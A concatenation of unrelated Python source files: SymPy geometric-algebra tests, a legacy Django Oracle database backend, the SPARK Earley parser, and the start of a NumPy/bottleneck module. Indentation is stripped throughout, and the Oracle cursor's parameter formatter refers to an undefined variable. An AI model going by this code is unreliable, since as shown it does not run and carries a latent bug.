Wd_1 = Wd[S.One]
Wd_C = Wd[BigC]
Wd_S = Wd[BigS]
assert str(Wd_1) == '(X.e)*(Y.e)'
assert str(Wd_C) == '(X.Y) - (X.e)*(Y.e)'
assert str(Wd_S) == 'sqrt((X.Y)**2 - 2*(X.Y)*(X.e)*(Y.e))'
assert str(Bmag) == 'sqrt((X.Y)**2 - 2*(X.Y)*(X.e)*(Y.e))'
Wd_1 = Wd_1.subs(Bmag, 1/Binv)
Wd_C = Wd_C.subs(Bmag, 1/Binv)
Wd_S = Wd_S.subs(Bmag, 1/Binv)
lhs = Wd_1 + Wd_C*BigC
rhs = -Wd_S*BigS
lhs = lhs**2
rhs = rhs**2
W = expand(lhs - rhs)
W = expand(W.subs(1/Binv**2, Bmag**2))
W = expand(W.subs(BigS**2, BigC**2 - 1))
W = W.collect([BigC, BigC**2], evaluate=False)
a = simplify(W[BigC**2])
b = simplify(W[BigC])
c = simplify(W[S.One])
assert str(a) == '(X.e)**2*(Y.e)**2'
assert str(b) == '2*(X.e)*(Y.e)*((X.Y) - (X.e)*(Y.e))'
assert str(c) == '(X.Y)**2 - 2*(X.Y)*(X.e)*(Y.e) + (X.e)**2*(Y.e)**2'
x = Symbol('x')
C = solve(a*x**2 + b*x + c, x)[0]
assert str(expand(simplify(expand(C)))) == '-(X.Y)/((X.e)*(Y.e)) + 1'
return
def test_conformal_representations_of_circles_lines_spheres_and_planes():
global n, nbar
with GA_Printer():
metric = '1 0 0 0 0,0 1 0 0 0,0 0 1 0 0,0 0 0 0 2,0 0 0 2 0'
(e1, e2, e3, n, nbar) = MV.setup('e_1 e_2 e_3 n nbar', metric)
e = n + nbar
#conformal representation of points
A = make_vector(e1)
B = make_vector(e2)
C = make_vector(-e1)
D = make_vector(e3)
X = make_vector('x', 3)
assert str(A) == 'e_1 + 1/2*n - 1/2*nbar'
assert str(B) == 'e_2 + 1/2*n - 1/2*nbar'
assert str(C) == '-e_1 + 1/2*n - 1/2*nbar'
assert str(D) == 'e_3 + 1/2*n - 1/2*nbar'
assert str(X) == 'x1*e_1 + x2*e_2 + x3*e_3 + ((x1**2 + x2**2 + x3**2)/2)*n - 1/2*nbar'
assert str((A ^ B ^ C ^ X)) == '-x3*e_1^e_2^e_3^n + x3*e_1^e_2^e_3^nbar + ((x1**2 + x2**2 + x3**2 - 1)/2)*e_1^e_2^n^nbar'
assert str((A ^ B ^ n ^ X)) == '-x3*e_1^e_2^e_3^n + ((x1 + x2 - 1)/2)*e_1^e_2^n^nbar + x3/2*e_1^e_3^n^nbar - x3/2*e_2^e_3^n^nbar'
assert str((((A ^ B) ^ C) ^ D) ^ X) == '((-x1**2 - x2**2 - x3**2 + 1)/2)*e_1^e_2^e_3^n^nbar'
assert str((A ^ B ^ n ^ D ^ X)) == '((-x1 - x2 - x3 + 1)/2)*e_1^e_2^e_3^n^nbar'
L = (A ^ B ^ e) ^ X
assert str(L) == '-x3*e_1^e_2^e_3^n - x3*e_1^e_2^e_3^nbar + (-x1**2/2 + x1 - x2**2/2 + x2 - x3**2/2 - 1/2)*e_1^e_2^n^nbar + x3*e_1^e_3^n^nbar - x3*e_2^e_3^n^nbar'
return
def test_properties_of_geometric_objects():
with GA_Printer():
metric = '# # # 0 0,' + \
'# # # 0 0,' + \
'# # # 0 0,' + \
'0 0 0 0 2,' + \
'0 0 0 2 0'
(p1, p2, p3, n, nbar) = MV.setup('p1 p2 p3 n nbar', metric)
P1 = F(p1, n, nbar)
P2 = F(p2, n, nbar)
P3 = F(p3, n, nbar)
L = P1 ^ P2 ^ n
delta = (L | n) | nbar
assert str(delta) == '2*p1 - 2*p2'
C = P1 ^ P2 ^ P3
delta = ((C ^ n) | n) | nbar
assert str(delta) == '2*p1^p2 - 2*p1^p3 + 2*p2^p3'
assert str((p2 - p1) ^ (p3 - p1)) == 'p1^p2 - p1^p3 + p2^p3'
return
def test_extracting_vectors_from_conformal_2_blade():
with GA_Printer():
metric = ' 0 -1 #,' + \
'-1 0 #,' + \
' # # #,'
(P1, P2, a) = MV.setup('P1 P2 a', metric)
B = P1 ^ P2
Bsq = B*B
assert str(Bsq) == '1'
ap = a - (a ^ B)*B
assert str(ap) == '-(P2.a)*P1 - (P1.a)*P2'
Ap = ap + ap*B
Am = ap - ap*B
assert str(Ap) == '-2*(P2.a)*P1'
assert str(Am) == '-2*(P1.a)*P2'
assert str(Ap*Ap) == '0'
assert str(Am*Am) == '0'
aB = a | B
assert str(aB) == '-(P2.a)*P1 + (P1.a)*P2'
return
def test_reciprocal_frame_test():
with GA_Printer():
metric = '1 # #,' + \
'# 1 #,' + \
'# # 1,'
(e1, e2, e3) = MV.setup('e1 e2 e3', metric)
E = e1 ^ e2 ^ e3
Esq = (E*E).scalar()
assert str(E) == 'e1^e2^e3'
assert str(Esq) == '(e1.e2)**2 - 2*(e1.e2)*(e1.e3)*(e2.e3) + (e1.e3)**2 + (e2.e3)**2 - 1'
Esq_inv = 1/Esq
E1 = (e2 ^ e3)*E
E2 = (-1)*(e1 ^ e3)*E
E3 = (e1 ^ e2)*E
assert str(E1) == '((e2.e3)**2 - 1)*e1 + ((e1.e2) - (e1.e3)*(e2.e3))*e2 + (-(e1.e2)*(e2.e3) + (e1.e3))*e3'
assert str(E2) == '((e1.e2) - (e1.e3)*(e2.e3))*e1 + ((e1.e3)**2 - 1)*e2 + (-(e1.e2)*(e1.e3) + (e2.e3))*e3'
assert str(E3) == '(-(e1.e2)*(e2.e3) + (e1.e3))*e1 + (-(e1.e2)*(e1.e3) + (e2.e3))*e2 + ((e1.e2)**2 - 1)*e3'
w = (E1 | e2)
w = w.expand()
assert str(w) == '0'
w = (E1 | e3)
w = w.expand()
assert str(w) == '0'
w = (E2 | e1)
w = w.expand()
assert str(w) == '0'
w = (E2 | e3)
w = w.expand()
assert str(w) == '0'
w = (E3 | e1)
w = w.expand()
assert str(w) == '0'
w = (E3 | e2)
w = w.expand()
assert str(w) == '0'
w = (E1 | e1)
w = (w.expand()).scalar()
Esq = expand(Esq)
assert str(simplify(w/Esq)) == '1'
w = (E2 | e2)
w = (w.expand()).scalar()
assert str(simplify(w/Esq)) == '1'
w = (E3 | e3)
w = (w.expand()).scalar()
assert str(simplify(w/Esq)) == '1'
return
| |
"""
Oracle database backend for Django.
Requires cx_Oracle: http://www.python.net/crew/atuining/cx_Oracle/
"""
import os
from django.db.backends import BaseDatabaseWrapper, BaseDatabaseFeatures, BaseDatabaseOperations, util
from django.db.backends.oracle import query
from django.utils.datastructures import SortedDict
from django.utils.encoding import smart_str, force_unicode
# Oracle takes client-side character set encoding from the environment.
os.environ['NLS_LANG'] = '.UTF8'
try:
import cx_Oracle as Database
except ImportError, e:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("Error loading cx_Oracle module: %s" % e)
DatabaseError = Database.Error
IntegrityError = Database.IntegrityError
class DatabaseFeatures(BaseDatabaseFeatures):
allows_group_by_ordinal = False
allows_unique_and_pk = False # Suppress UNIQUE/PK for Oracle (ORA-02259)
empty_fetchmany_value = ()
needs_datetime_string_cast = False
supports_tablespaces = True
uses_case_insensitive_names = True
uses_custom_query_class = True
time_field_needs_date = True
interprets_empty_strings_as_nulls = True
date_field_supports_time_value = False
class DatabaseOperations(BaseDatabaseOperations):
def autoinc_sql(self, table, column):
# To simulate auto-incrementing primary keys in Oracle, we have to
# create a sequence and a trigger.
sq_name = get_sequence_name(table)
tr_name = get_trigger_name(table)
tbl_name = self.quote_name(table)
col_name = self.quote_name(column)
sequence_sql = 'CREATE SEQUENCE %s;' % sq_name
trigger_sql = """
CREATE OR REPLACE TRIGGER %(tr_name)s
BEFORE INSERT ON %(tbl_name)s
FOR EACH ROW
WHEN (new.%(col_name)s IS NULL)
BEGIN
SELECT %(sq_name)s.nextval
INTO :new.%(col_name)s FROM dual;
END;
/""" % locals()
return sequence_sql, trigger_sql
def date_extract_sql(self, lookup_type, field_name):
# http://download-east.oracle.com/docs/cd/B10501_01/server.920/a96540/functions42a.htm#1017163
return "EXTRACT(%s FROM %s)" % (lookup_type, field_name)
def date_trunc_sql(self, lookup_type, field_name):
# Oracle uses TRUNC() for both dates and numbers.
# http://download-east.oracle.com/docs/cd/B10501_01/server.920/a96540/functions155a.htm#SQLRF06151
if lookup_type == 'day':
sql = 'TRUNC(%s)' % field_name
else:
sql = "TRUNC(%s, '%s')" % (field_name, lookup_type)
return sql
def datetime_cast_sql(self):
return "TO_TIMESTAMP(%s, 'YYYY-MM-DD HH24:MI:SS.FF')"
def deferrable_sql(self):
return " DEFERRABLE INITIALLY DEFERRED"
def drop_sequence_sql(self, table):
return "DROP SEQUENCE %s;" % self.quote_name(get_sequence_name(table))
def field_cast_sql(self, db_type):
if db_type and db_type.endswith('LOB'):
return "DBMS_LOB.SUBSTR(%s)"
else:
return "%s"
def last_insert_id(self, cursor, table_name, pk_name):
sq_name = util.truncate_name(table_name, self.max_name_length() - 3)
cursor.execute('SELECT %s_sq.currval FROM dual' % sq_name)
return cursor.fetchone()[0]
def limit_offset_sql(self, limit, offset=None):
# Limits and offset are too complicated to be handled here.
# Instead, they are handled in django/db/backends/oracle/query.py.
return ""
def lookup_cast(self, lookup_type):
if lookup_type in ('iexact', 'icontains', 'istartswith', 'iendswith'):
return "UPPER(%s)"
return "%s"
def max_name_length(self):
return 30
def query_class(self, DefaultQueryClass):
return query.query_class(DefaultQueryClass, Database)
def quote_name(self, name):
# SQL92 requires delimited (quoted) names to be case-sensitive. When
# not quoted, Oracle has case-insensitive behavior for identifiers, but
# always defaults to uppercase.
# We simplify things by making Oracle identifiers always uppercase.
if not name.startswith('"') and not name.endswith('"'):
name = '"%s"' % util.truncate_name(name.upper(), self.max_name_length())
return name.upper()
def random_function_sql(self):
return "DBMS_RANDOM.RANDOM"
def regex_lookup_9(self, lookup_type):
raise NotImplementedError("Regexes are not supported in Oracle before version 10g.")
def regex_lookup_10(self, lookup_type):
if lookup_type == 'regex':
match_option = "'c'"
else:
match_option = "'i'"
return 'REGEXP_LIKE(%%s, %%s, %s)' % match_option
def regex_lookup(self, lookup_type):
# If regex_lookup is called before it's been initialized, then create
# a cursor to initialize it and recur.
from django.db import connection
connection.cursor()
return connection.ops.regex_lookup(lookup_type)
def sql_flush(self, style, tables, sequences):
# Return a list of 'TRUNCATE x;', 'TRUNCATE y;',
# 'TRUNCATE z;'... style SQL statements
if tables:
# Oracle does support TRUNCATE, but it seems to get us into
# FK referential trouble, whereas DELETE FROM table works.
sql = ['%s %s %s;' % \
(style.SQL_KEYWORD('DELETE'),
style.SQL_KEYWORD('FROM'),
style.SQL_FIELD(self.quote_name(table))
) for table in tables]
# Since we've just deleted all the rows, running our sequence
# ALTER code will reset the sequence to 0.
for sequence_info in sequences:
table_name = sequence_info['table']
seq_name = get_sequence_name(table_name)
column_name = self.quote_name(sequence_info['column'] or 'id')
query = _get_sequence_reset_sql() % {'sequence': seq_name,
'table': self.quote_name(table_name),
'column': column_name}
sql.append(query)
return sql
else:
return []
def sequence_reset_sql(self, style, model_list):
from django.db import models
output = []
query = _get_sequence_reset_sql()
for model in model_list:
for f in model._meta.fields:
if isinstance(f, models.AutoField):
sequence_name = get_sequence_name(model._meta.db_table)
column_name = self.quote_name(f.db_column or f.name)
output.append(query % {'sequence': sequence_name,
'table': model._meta.db_table,
'column': column_name})
break # Only one AutoField is allowed per model, so don't bother continuing.
for f in model._meta.many_to_many:
sequence_name = get_sequence_name(f.m2m_db_table())
output.append(query % {'sequence': sequence_name,
'table': f.m2m_db_table(),
'column': self.quote_name('id')})
return output
def start_transaction_sql(self):
return ''
def tablespace_sql(self, tablespace, inline=False):
return "%sTABLESPACE %s" % ((inline and "USING INDEX " or ""), self.quote_name(tablespace))
class DatabaseWrapper(BaseDatabaseWrapper):
features = DatabaseFeatures()
ops = DatabaseOperations()
operators = {
'exact': '= %s',
'iexact': '= UPPER(%s)',
'contains': "LIKEC %s ESCAPE '\\'",
'icontains': "LIKEC UPPER(%s) ESCAPE '\\'",
'gt': '> %s',
'gte': '>= %s',
'lt': '< %s',
'lte': '<= %s',
'startswith': "LIKEC %s ESCAPE '\\'",
'endswith': "LIKEC %s ESCAPE '\\'",
'istartswith': "LIKEC UPPER(%s) ESCAPE '\\'",
'iendswith': "LIKEC UPPER(%s) ESCAPE '\\'",
}
oracle_version = None
def _valid_connection(self):
return self.connection is not None
def _cursor(self, settings):
cursor = None
if not self._valid_connection():
if len(settings.DATABASE_HOST.strip()) == 0:
settings.DATABASE_HOST = 'localhost'
if len(settings.DATABASE_PORT.strip()) != 0:
dsn = Database.makedsn(settings.DATABASE_HOST, int(settings.DATABASE_PORT), settings.DATABASE_NAME)
self.connection = Database.connect(settings.DATABASE_USER, settings.DATABASE_PASSWORD, dsn, **self.options)
else:
conn_string = "%s/%s@%s" % (settings.DATABASE_USER, settings.DATABASE_PASSWORD, settings.DATABASE_NAME)
self.connection = Database.connect(conn_string, **self.options)
cursor = FormatStylePlaceholderCursor(self.connection)
# Set oracle date to ansi date format. This only needs to execute
# once when we create a new connection.
cursor.execute("ALTER SESSION SET NLS_DATE_FORMAT = 'YYYY-MM-DD' "
"NLS_TIMESTAMP_FORMAT = 'YYYY-MM-DD HH24:MI:SS.FF'")
try:
self.oracle_version = int(self.connection.version.split('.')[0])
# There's no way for the DatabaseOperations class to know the
# currently active Oracle version, so we do some setups here.
# TODO: Multi-db support will need a better solution (a way to
# communicate the current version).
if self.oracle_version <= 9:
self.ops.regex_lookup = self.ops.regex_lookup_9
else:
self.ops.regex_lookup = self.ops.regex_lookup_10
except ValueError:
pass
try:
self.connection.stmtcachesize = 20
except:
# Django docs specify cx_Oracle version 4.3.1 or higher, but
# stmtcachesize is available only in 4.3.2 and up.
pass
if not cursor:
cursor = FormatStylePlaceholderCursor(self.connection)
# Default arraysize of 1 is highly sub-optimal.
cursor.arraysize = 100
return cursor
class OracleParam(object):
"""
Wrapper object for formatting parameters for Oracle. If the string
representation of the value is large enough (greater than 4000 characters)
the input size needs to be set as NCLOB. Alternatively, if the parameter has
an `input_size` attribute, then the value of the `input_size` attribute will
be used instead. Otherwise, no input size will be set for the parameter when
executing the query.
"""
def __init__(self, param, charset, strings_only=False):
self.smart_str = smart_str(param, charset, strings_only)
if hasattr(param, 'input_size'):
# If parameter has `input_size` attribute, use that.
self.input_size = param.input_size
elif isinstance(param, basestring) and len(param) > 4000:
# Mark any string parameter greater than 4000 characters as an NCLOB.
self.input_size = Database.NCLOB
else:
self.input_size = None
class FormatStylePlaceholderCursor(Database.Cursor):
"""
Django uses "format" (e.g. '%s') style placeholders, but Oracle uses ":var"
style. This fixes it -- but note that if you want to use a literal "%s" in
a query, you'll need to use "%%s".
We also do automatic conversion between Unicode on the Python side and
UTF-8 -- for talking to Oracle -- in here.
"""
charset = 'utf-8'
def _format_params(self, params):
if isinstance(params, dict):
result = {}
for key, value in params.items():
result[smart_str(key, self.charset)] = OracleParam(param, self.charset)
return result
else:
return tuple([OracleParam(p, self.charset, True) for p in params])
def _guess_input_sizes(self, params_list):
if isinstance(params_list[0], dict):
sizes = {}
iterators = [params.iteritems() for params in params_list]
else:
sizes = [None] * len(params_list[0])
iterators = [enumerate(params) for params in params_list]
for iterator in iterators:
for key, value in iterator:
if value.input_size: sizes[key] = value.input_size
if isinstance(sizes, dict):
self.setinputsizes(**sizes)
else:
self.setinputsizes(*sizes)
def _param_generator(self, params):
if isinstance(params, dict):
return dict([(k, p.smart_str) for k, p in params.iteritems()])
else:
return [p.smart_str for p in params]
def execute(self, query, params=None):
if params is None:
params = []
else:
params = self._format_params(params)
args = [(':arg%d' % i) for i in range(len(params))]
# cx_Oracle wants no trailing ';' for SQL statements. For PL/SQL, it
# it does want a trailing ';' but not a trailing '/'. However, these
# characters must be included in the original query in case the query
# is being passed to SQL*Plus.
if query.endswith(';') or query.endswith('/'):
query = query[:-1]
query = smart_str(query, self.charset) % tuple(args)
self._guess_input_sizes([params])
return Database.Cursor.execute(self, query, self._param_generator(params))
def executemany(self, query, params=None):
try:
args = [(':arg%d' % i) for i in range(len(params[0]))]
except (IndexError, TypeError):
# No params given, nothing to do
return None
# cx_Oracle wants no trailing ';' for SQL statements. For PL/SQL, it
# it does want a trailing ';' but not a trailing '/'. However, these
# characters must be included in the original query in case the query
# is being passed to SQL*Plus.
if query.endswith(';') or query.endswith('/'):
query = query[:-1]
query = smart_str(query, self.charset) % tuple(args)
formatted = [self._format_params(i) for i in params]
self._guess_input_sizes(formatted)
return Database.Cursor.executemany(self, query, [self._param_generator(p) for p in formatted])
def fetchone(self):
row = Database.Cursor.fetchone(self)
if row is None:
return row
return tuple([to_unicode(e) for e in row])
def fetchmany(self, size=None):
if size is None:
size = self.arraysize
return tuple([tuple([to_unicode(e) for e in r]) for r in Database.Cursor.fetchmany(self, size)])
def fetchall(self):
return tuple([tuple([to_unicode(e) for e in r]) for r in Database.Cursor.fetchall(self)])
def to_unicode(s):
"""
Convert strings to Unicode objects (and return all other data types
unchanged).
"""
if isinstance(s, basestring):
return force_unicode(s)
return s
def _get_sequence_reset_sql():
# TODO: colorize this SQL code with style.SQL_KEYWORD(), etc.
return """
DECLARE
startvalue integer;
cval integer;
BEGIN
LOCK TABLE %(table)s IN SHARE MODE;
SELECT NVL(MAX(%(column)s), 0) INTO startvalue FROM %(table)s;
SELECT %(sequence)s.nextval INTO cval FROM dual;
cval := startvalue - cval;
IF cval != 0 THEN
EXECUTE IMMEDIATE 'ALTER SEQUENCE %(sequence)s MINVALUE 0 INCREMENT BY '||cval;
SELECT %(sequence)s.nextval INTO cval FROM dual;
EXECUTE IMMEDIATE 'ALTER SEQUENCE %(sequence)s INCREMENT BY 1';
END IF;
COMMIT;
END;
/"""
def get_sequence_name(table):
name_length = DatabaseOperations().max_name_length() - 3
return '%s_SQ' % util.truncate_name(table, name_length).upper()
def get_trigger_name(table):
name_length = DatabaseOperations().max_name_length() - 3
return '%s_TR' % util.truncate_name(table, name_length).upper()
| |
# Copyright (c) 1998-2000 John Aycock
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
__version__ = 'SPARK-0.6.1'
import re
import sys
import string
def _namelist(instance):
namelist, namedict, classlist = [], {}, [instance.__class__]
for c in classlist:
for b in c.__bases__:
classlist.append(b)
#for name in dir(c): # dir() behavior changed in 2.2
for name in c.__dict__.keys(): # <-- USE THIS
if not namedict.has_key(name):
namelist.append(name)
namedict[name] = 1
return namelist
class GenericScanner:
def __init__(self):
pattern = self.reflect()
self.re = re.compile(pattern, re.VERBOSE)
self.index2func = {}
for name, number in self.re.groupindex.items():
self.index2func[number-1] = getattr(self, 't_' + name)
def makeRE(self, name):
doc = getattr(self, name).__doc__
rv = '(?P<%s>%s)' % (name[2:], doc)
return rv
def reflect(self):
rv = []
for name in _namelist(self):
if name[:2] == 't_' and name != 't_default':
rv.append(self.makeRE(name))
rv.append(self.makeRE('t_default'))
return string.join(rv, '|')
def error(self, s, pos):
print "Lexical error at position %s" % pos
raise SystemExit
def tokenize(self, s):
pos = 0
n = len(s)
while pos < n:
m = self.re.match(s, pos)
if m is None:
self.error(s, pos)
groups = m.groups()
for i in range(len(groups)):
if groups[i] and self.index2func.has_key(i):
self.index2func[i](groups[i])
pos = m.end()
def t_default(self, s):
r'( . | \n )+'
pass
class GenericParser:
def __init__(self, start):
self.rules = {}
self.rule2func = {}
self.rule2name = {}
self.collectRules()
self.startRule = self.augment(start)
self.ruleschanged = 1
_START = 'START'
_EOF = 'EOF'
#
# A hook for GenericASTBuilder and GenericASTMatcher.
#
def preprocess(self, rule, func): return rule, func
def addRule(self, doc, func):
rules = string.split(doc)
index = []
for i in range(len(rules)):
if rules[i] == '::=':
index.append(i-1)
index.append(len(rules))
for i in range(len(index)-1):
lhs = rules[index[i]]
rhs = rules[index[i]+2:index[i+1]]
rule = (lhs, tuple(rhs))
rule, fn = self.preprocess(rule, func)
if self.rules.has_key(lhs):
self.rules[lhs].append(rule)
else:
self.rules[lhs] = [ rule ]
self.rule2func[rule] = fn
self.rule2name[rule] = func.__name__[2:]
self.ruleschanged = 1
def collectRules(self):
for name in _namelist(self):
if name[:2] == 'p_':
func = getattr(self, name)
doc = func.__doc__
self.addRule(doc, func)
def augment(self, start):
#
# Tempting though it is, this isn't made into a call
# to self.addRule() because the start rule shouldn't
# be subject to preprocessing.
#
startRule = (self._START, ( start, self._EOF ))
self.rule2func[startRule] = lambda args: args[0]
self.rules[self._START] = [ startRule ]
self.rule2name[startRule] = ''
return startRule
def makeFIRST(self):
union = {}
self.first = {}
for rulelist in self.rules.values():
for lhs, rhs in rulelist:
if not self.first.has_key(lhs):
self.first[lhs] = {}
if len(rhs) == 0:
self.first[lhs][None] = 1
continue
sym = rhs[0]
if not self.rules.has_key(sym):
self.first[lhs][sym] = 1
else:
union[(sym, lhs)] = 1
changes = 1
while changes:
changes = 0
for src, dest in union.keys():
destlen = len(self.first[dest])
self.first[dest].update(self.first[src])
if len(self.first[dest]) != destlen:
changes = 1
#
# An Earley parser, as per J. Earley, "An Efficient Context-Free
# Parsing Algorithm", CACM 13(2), pp. 94-102. Also J. C. Earley,
# "An Efficient Context-Free Parsing Algorithm", Ph.D. thesis,
# Carnegie-Mellon University, August 1968, p. 27.
#
def typestring(self, token):
return None
def error(self, token):
print "Syntax error at or near `%s' token" % token
raise SystemExit
def parse(self, tokens):
tree = {}
tokens.append(self._EOF)
states = { 0: [ (self.startRule, 0, 0) ] }
if self.ruleschanged:
self.makeFIRST()
for i in xrange(len(tokens)):
states[i+1] = []
if states[i] == []:
break
self.buildState(tokens[i], states, i, tree)
#_dump(tokens, states)
if i < len(tokens)-1 or states[i+1] != [(self.startRule, 2, 0)]:
del tokens[-1]
self.error(tokens[i-1])
rv = self.buildTree(tokens, tree, ((self.startRule, 2, 0), i+1))
del tokens[-1]
return rv
def buildState(self, token, states, i, tree):
needsCompletion = {}
state = states[i]
predicted = {}
#print state
#print token
for item in state:
rule, pos, parent = item
lhs, rhs = rule
#
# A -> a . (completer)
#
if pos == len(rhs):
if len(rhs) == 0:
needsCompletion[lhs] = (item, i)
for pitem in states[parent]:
if pitem is item:
break
prule, ppos, pparent = pitem
plhs, prhs = prule
if prhs[ppos:ppos+1] == (lhs,):
new = (prule,
ppos+1,
pparent)
if new not in state:
state.append(new)
tree[(new, i)] = [(item, i)]
else:
tree[(new, i)].append((item, i))
continue
nextSym = rhs[pos]
#
# A -> a . B (predictor)
#
if self.rules.has_key(nextSym):
#
# Work on completer step some more; for rules
# with empty RHS, the "parent state" is the
# current state we're adding Earley items to,
# so the Earley items the completer step needs
# may not all be present when it runs.
#
if needsCompletion.has_key(nextSym):
new = (rule, pos+1, parent)
olditem_i = needsCompletion[nextSym]
if new not in state:
state.append(new)
tree[(new, i)] = [olditem_i]
else:
tree[(new, i)].append(olditem_i)
#
# Has this been predicted already?
#
if predicted.has_key(nextSym):
continue
predicted[nextSym] = 1
ttype = token is not self._EOF and \
self.typestring(token) or \
None
if ttype is not None:
#
# Even smarter predictor, when the
# token's type is known. The code is
# grungy, but runs pretty fast. Three
# cases are looked for: rules with
# empty RHS; first symbol on RHS is a
# terminal; first symbol on RHS is a
# nonterminal (and isn't nullable).
#
for prule in self.rules[nextSym]:
new = (prule, 0, i)
prhs = prule[1]
if len(prhs) == 0:
state.append(new)
continue
prhs0 = prhs[0]
if not self.rules.has_key(prhs0):
if prhs0 != ttype:
continue
else:
state.append(new)
continue
first = self.first[prhs0]
if not first.has_key(None) and \
not first.has_key(ttype):
continue
state.append(new)
continue
for prule in self.rules[nextSym]:
#
# Smarter predictor, as per Grune &
# Jacobs' _Parsing Techniques_. Not
# as good as FIRST sets though.
#
prhs = prule[1]
if len(prhs) > 0 and \
not self.rules.has_key(prhs[0]) and \
token != prhs[0]:
continue
state.append((prule, 0, i))
#
# A -> a . c (scanner)
#
elif token == nextSym:
#assert new not in states[i+1]
states[i+1].append((rule, pos+1, parent))
def buildTree(self, tokens, tree, root):
stack = []
self.buildTree_r(stack, tokens, -1, tree, root)
return stack[0]
def buildTree_r(self, stack, tokens, tokpos, tree, root):
(rule, pos, parent), state = root
while pos > 0:
want = ((rule, pos, parent), state)
if not tree.has_key(want):
#
# Since pos > 0, it didn't come from closure,
# and if it isn't in tree[], then there must
# be a terminal symbol to the left of the dot.
# (It must be from a "scanner" step.)
#
pos = pos - 1
state = state - 1
stack.insert(0, tokens[tokpos])
tokpos = tokpos - 1
else:
#
# There's a NT to the left of the dot.
# Follow the tree pointer recursively (>1
# tree pointers from it indicates ambiguity).
# Since the item must have come about from a
# "completer" step, the state where the item
# came from must be the parent state of the
# item the tree pointer points to.
#
children = tree[want]
if len(children) > 1:
child = self.ambiguity(children)
else:
child = children[0]
tokpos = self.buildTree_r(stack,
tokens, tokpos,
tree, child)
pos = pos - 1
(crule, cpos, cparent), cstate = child
state = cparent
lhs, rhs = rule
result = self.rule2func[rule](stack[:len(rhs)])
stack[:len(rhs)] = [result]
return tokpos
def ambiguity(self, children):
#
# XXX - problem here and in collectRules() if the same
# rule appears in >1 method. But in that case the
# user probably gets what they deserve :-) Also
# undefined results if rules causing the ambiguity
# appear in the same method.
#
sortlist = []
name2index = {}
for i in range(len(children)):
((rule, pos, parent), index) = children[i]
lhs, rhs = rule
name = self.rule2name[rule]
sortlist.append((len(rhs), name))
name2index[name] = i
sortlist.sort()
list = map(lambda (a,b): b, sortlist)
return children[name2index[self.resolve(list)]]
def resolve(self, list):
#
# Resolve ambiguity in favor of the shortest RHS.
# Since we walk the tree from the top down, this
# should effectively resolve in favor of a "shift".
#
return list[0]
#
# GenericASTBuilder automagically constructs a concrete/abstract syntax tree
# for a given input. The extra argument is a class (not an instance!)
# which supports the "__setslice__" and "__len__" methods.
#
# XXX - silently overrides any user code in methods.
#
class GenericASTBuilder(GenericParser):
def __init__(self, AST, start):
GenericParser.__init__(self, start)
self.AST = AST
def preprocess(self, rule, func):
rebind = lambda lhs, self=self: \
lambda args, lhs=lhs, self=self: \
self.buildASTNode(args, lhs)
lhs, rhs = rule
return rule, rebind(lhs)
def buildASTNode(self, args, lhs):
children = []
for arg in args:
if isinstance(arg, self.AST):
children.append(arg)
else:
children.append(self.terminal(arg))
return self.nonterminal(lhs, children)
def terminal(self, token): return token
def nonterminal(self, type, args):
rv = self.AST(type)
rv[:len(args)] = args
return rv
#
# GenericASTTraversal is a Visitor pattern according to Design Patterns. For
# each node it attempts to invoke the method n_<node type>, falling
# back onto the default() method if the n_* can't be found. The preorder
# traversal also looks for an exit hook named n_<node type>_exit (no default
# routine is called if it's not found). To prematurely halt traversal
# of a subtree, call the prune() method -- this only makes sense for a
# preorder traversal. Node type is determined via the typestring() method.
#
class GenericASTTraversalPruningException:
pass
class GenericASTTraversal:
def __init__(self, ast):
self.ast = ast
def typestring(self, node):
return node.type
def prune(self):
raise GenericASTTraversalPruningException
def preorder(self, node=None):
if node is None:
node = self.ast
try:
name = 'n_' + self.typestring(node)
if hasattr(self, name):
func = getattr(self, name)
#print("Calling "+name)
func(node)
else:
self.default(node)
except GenericASTTraversalPruningException:
return
for kid in node:
self.preorder(kid)
name = name + '_exit'
if hasattr(self, name):
func = getattr(self, name)
func(node)
def postorder(self, node=None):
if node is None:
node = self.ast
for kid in node:
self.postorder(kid)
name = 'n_' + self.typestring(node)
if hasattr(self, name):
func = getattr(self, name)
func(node)
else:
self.default(node)
def default(self, node):
pass
#
# GenericASTMatcher. AST nodes must have "__getitem__" and "__cmp__"
# implemented.
#
# XXX - makes assumptions about how GenericParser walks the parse tree.
#
class GenericASTMatcher(GenericParser):
def __init__(self, start, ast):
GenericParser.__init__(self, start)
self.ast = ast
def preprocess(self, rule, func):
rebind = lambda func, self=self: \
lambda args, func=func, self=self: \
self.foundMatch(args, func)
lhs, rhs = rule
rhslist = list(rhs)
rhslist.reverse()
return (lhs, tuple(rhslist)), rebind(func)
def foundMatch(self, args, func):
func(args[-1])
return args[-1]
def match_r(self, node):
self.input.insert(0, node)
children = 0
for child in node:
if children == 0:
self.input.insert(0, '(')
children = children + 1
self.match_r(child)
if children > 0:
self.input.insert(0, ')')
def match(self, ast=None):
if ast is None:
ast = self.ast
self.input = []
self.match_r(ast)
self.parse(self.input)
def resolve(self, list):
#
# Resolve ambiguity in favor of the longest RHS.
#
return list[-1]
def _dump(tokens, states):
for i in range(len(states)):
print 'state', i
for (lhs, rhs), pos, parent in states[i]:
print '\t', lhs, '::=',
print string.join(rhs[:pos]),
print '.',
print string.join(rhs[pos:]),
print ',', parent
if i < len(tokens):
print
print 'token', str(tokens[i])
print
| |
from typing import Callable, List, Union
import numpy as np
import bottleneck as bn
INT_DTYPES = [np.int64, np.int32]
FLOAT_DTYPES = [np.float64, np.float32]
DTYPES = tuple(FLOAT_DTYPES + INT_DTYPES)
